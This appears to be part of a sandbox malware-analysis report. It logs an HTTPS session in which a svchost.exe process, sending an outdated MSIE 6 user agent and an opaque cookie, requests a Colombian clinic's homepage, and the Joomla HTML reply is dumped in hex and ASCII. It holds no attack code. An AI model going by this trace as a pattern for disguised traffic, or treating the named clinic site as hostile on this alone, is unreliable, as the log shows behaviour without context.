                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        157192.168.2.664807104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2367OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                        Cookie: d55e479f054c94814cbc10d217aaa990=bbd2a9ecd1f16e6deb08a6c096c7155a
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2402INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:30 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:56:30 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6taSvICEg9OR9%2FfZmNDrEeAABRKVQgxhNp%2FFjZPQMZE%2Bq3sm8YYZEyT7u6B%2FM9KzOM%2FZoOnEzt4WZJj2iEv9jd1Uj6CC3WuDtR0QFDrSVonwzsdcsCLFXcKtrxQ2Obg%2FH1bx%2FY3jROs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a87a392868f2-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2403INData Raw: 37 63 61 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                        Data Ascii: 7ca9<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2404INData Raw: 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2d 63 6f 6d 70 69 6c 65 64 2f 6e 75 63 6c 65 75 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f
                                                                                                                                                                                                                                                                        Data Ascii: dules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/users/nucleus/css-compiled/nucleus.css" rel="stylesheet" /><link href="/
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2405INData Raw: 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 6a 73 2f 72 6f 6b 62 6f 78 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 62 6f
                                                                                                                                                                                                                                                                        Data Ascii: tem/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokbox/assets/js/rokbox.js"></script><script src="/media/jui/js/bo
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2406INData Raw: 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                        Data Ascii: y5/users/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel="shortcut icon" href="/images/favicon.png"></head><body class
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2408INData Raw: 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 30 34 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20
                                                                                                                                                                                                                                                                        Data Ascii: lock size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-menu-item-type-separator g-menu-item-104 g-parent g-standard
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2409INData Raw: 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 65 64 69 61 74 72 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: nu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"> <span class="g-menu-item-content"><span class="g-menu-item-title">Pediatras</span></span></a></li>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2410INData Raw: 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d
                                                                                                                                                                                                                                                                        Data Ascii: </li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent=""> <span class="g-separator g-menu-item-content"> <span class="g-m
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2412INData Raw: 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75
                                                                                                                                                                                                                                                                        Data Ascii: ass="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2413INData Raw: 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d
                                                                                                                                                                                                                                                                        Data Ascii: g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2414INData Raw: 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e 20 64 65 20 c3 b3 72 67 61 6e 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e
                                                                                                                                                                                                                                                                        Data Ascii: ontainer" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin de rganos </span></span></a>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2416INData Raw: 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69
                                                                                                                                                                                                                                                                        Data Ascii: tem g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></span></a></li><li class="g-menu-i
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2417INData Raw: 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                        Data Ascii: li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></span></a></li><li class=
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2418INData Raw: 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d
                                                                                                                                                                                                                                                                        Data Ascii: a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2420INData Raw: 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 3b 2f 2a 70 6f 70 75 70 20 62
                                                                                                                                                                                                                                                                        Data Ascii: "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 255, 255, 1);/*popup b
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2421INData Raw: 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 22 20 69 64 3d 22 67
                                                                                                                                                                                                                                                                        Data Ascii: t: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafancybox-overlay" id="g
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2422INData Raw: 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e
                                                                                                                                                                                                                                                                        Data Ascii: ntById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target="_blank" rel="noopen
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2424INData Raw: 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63
                                                                                                                                                                                                                                                                        Data Ascii: block "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedbloc
